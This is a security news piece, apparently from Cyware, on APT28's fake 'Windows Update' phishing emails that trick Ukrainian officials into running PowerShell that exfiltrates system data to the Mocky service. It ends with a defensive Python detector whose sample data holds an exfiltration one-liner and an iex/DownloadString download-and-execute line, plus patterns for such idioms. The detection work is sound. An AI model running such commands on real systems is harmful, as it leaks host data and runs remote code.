
APT28 Uses 'Windows Update' Phishing Emails to Target Ukrainian Agencies

The Russian hacker group APT28 (aka Fancy Bear, Sednit, and Sofacy) is targeting Ukrainian government agencies with a new phishing campaign. The Kremlin-backed APT group is now sending phony Windows Update emails that trick recipients into running commands which collect and exfiltrate system data.

Active since 2008, APT28 has become notorious for its persistent targeting of Ukrainian government agencies since the beginning of the Russia-Ukraine conflict.

CERT-UA warning

CERT-UA issued a warning about the latest campaign, which uses fake Windows Update emails to lure its victims.
  • The attack begins with phishing emails sent to employees of government bodies; the messages impersonate the system administrators of the recipients' own departments.
  • The sender addresses are created on the public outlook[.]com email service and use the real surname and initials of the impersonated employees, so they pass a casual glance.
  • The subject line is "Windows Updates", and the body urges readers to follow the provided instructions to update their system immediately.

The email instructions

The email tells readers that they must update their systems to protect against cyberattacks by running the supplied PowerShell commands from a command prompt.
  • The message includes step-by-step instructions and screenshots for opening the command prompt and then executing the PowerShell commands.
  • Running the command downloads a further PowerShell script that displays a fake system/OS update procedure while, in the background, collecting information about the host with commands such as systeminfo and tasklist.
  • The collected information is sent to the attackers via HTTP requests to the Mocky service API, a legitimate mock-API hosting service used here as the exfiltration endpoint.

Safety tips

CERT-UA suggests that organizations monitor network connections to the Mocky server and restrict which users are allowed to run PowerShell code. Because the lure relies on the recipient typing the commands themselves, there is no malicious attachment or macro for mail filtering to catch, which makes PowerShell logging and egress monitoring the relevant controls. The agency further advises staying alert to phishing and spear-phishing emails, which attackers increasingly use to penetrate networks.
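The detection logic a defender would build from the two passages above (the script's systeminfo/tasklist-plus-HTTP behaviour, and CERT-UA's advice to watch for connections to the Mocky service), as an added example that is not part of the CERT-UA advisory or of this article: it scores PowerShell Script Block Logging (event ID 4104) text for the combination of reconnaissance commands, outbound HTTP calls, download-and-execute idioms and the Mocky domain, and separately flags hosts whose network-connection events reach that domain. The trait weights, the alert threshold, the sample log lines and hostnames, the placeholder URL path, and the use of `mocky.io` as the service's domain are all assumptions made for illustration.

```python
"""Score PowerShell script-block events for the traits described in the CERT-UA warning.

Added example, not CERT-UA or Cyware code. Assumptions: Script Block Logging
(event ID 4104) is enabled and each event is available as (user, text); the
Mocky service is reached under the mocky.io domain; weights and threshold are
arbitrary starting points to be tuned against local baselines.
"""
import re
from dataclasses import dataclass

# Trait name -> (regex, weight). Recon list is extended beyond the two commands
# the advisory names (whoami/ipconfig added as an assumption).
TRAITS = {
    "recon_cmd": (re.compile(r"\b(systeminfo|tasklist|whoami|ipconfig)\b", re.I), 1),
    "http_out": (re.compile(
        r"(Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b|Net\.WebClient"
        r"|DownloadString|DownloadFile|UploadString|curl\.exe)", re.I), 1),
    "download_exec": (re.compile(r"\b(iex|Invoke-Expression)\b", re.I), 1),
    "mocky": (re.compile(r"mocky\.io", re.I), 3),  # assumed exfil domain pattern
}
ALERT_THRESHOLD = 3  # assumption; tune per environment


@dataclass
class ScriptBlockEvent:
    user: str
    text: str


@dataclass
class Finding:
    user: str
    score: int
    traits: list


def score_event(ev: ScriptBlockEvent) -> Finding:
    """Sum the weights of matching traits; recon + HTTP in one block is the exfil shape, so bump it."""
    hits = [name for name, (rx, _w) in TRAITS.items() if rx.search(ev.text)]
    score = sum(TRAITS[name][1] for name in hits)
    if "recon_cmd" in hits and "http_out" in hits:
        score += 2
    return Finding(ev.user, score, hits)


def triage(events, threshold=ALERT_THRESHOLD):
    """Return findings at or above the threshold, in event order."""
    return [f for f in map(score_event, events) if f.score >= threshold]


def flag_connections(conn_events, domain_suffix="mocky.io"):
    """Sysmon event 3 style (host, destination hostname) pairs -> sorted hosts that reached the domain.

    Uses an exact or dot-prefixed suffix match so 'mocky.io.example.net' does not count."""
    suffix = "." + domain_suffix.lower()
    return sorted({host for host, dest in conn_events
                   if dest.lower() == domain_suffix.lower() or dest.lower().endswith(suffix)})


# Constructed sample script blocks (not real captured data); the mocky URL path is a placeholder.
SAMPLE_SCRIPT_BLOCKS = [
    ScriptBlockEvent("alice", "Get-Service | Where-Object Status -eq 'Running'"),
    ScriptBlockEvent("bob", "Invoke-RestMethod -Uri https://intranet.example/api/health"),
    ScriptBlockEvent("carol", r"systeminfo > C:\temp\info.txt"),
    ScriptBlockEvent("dave", "$r = systeminfo; $t = tasklist; Invoke-RestMethod -Method Post "
                             "-Uri https://run.mocky.io/v3/EXAMPLE-ID -Body ($r + $t)"),
    ScriptBlockEvent("dave", "iex (New-Object Net.WebClient).DownloadString("
                             "'https://run.mocky.io/v3/EXAMPLE-ID')"),
]

# Constructed sample network-connection events (host, destination hostname).
SAMPLE_CONNECTIONS = [
    ("WS-01", "run.mocky.io"),
    ("WS-02", "login.microsoftonline.com"),
    ("WS-03", "mocky.io.example.net"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"ALERT user={f.user} score={f.score} traits={','.join(f.traits)}")
    print("hosts that contacted mocky.io:", flag_connections(SAMPLE_CONNECTIONS))
```

Run stand-alone, the script reports only the two blocks from "dave": the full recon-plus-POST block scores 7 and the stage-one downloader scores 5, while the administrator's lone systeminfo and the health-check call stay below the threshold. The weights deliberately put most of the score on the Mocky domain and on the recon-plus-HTTP combination, since either alone is common in legitimate administration.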
Publisher: Cyware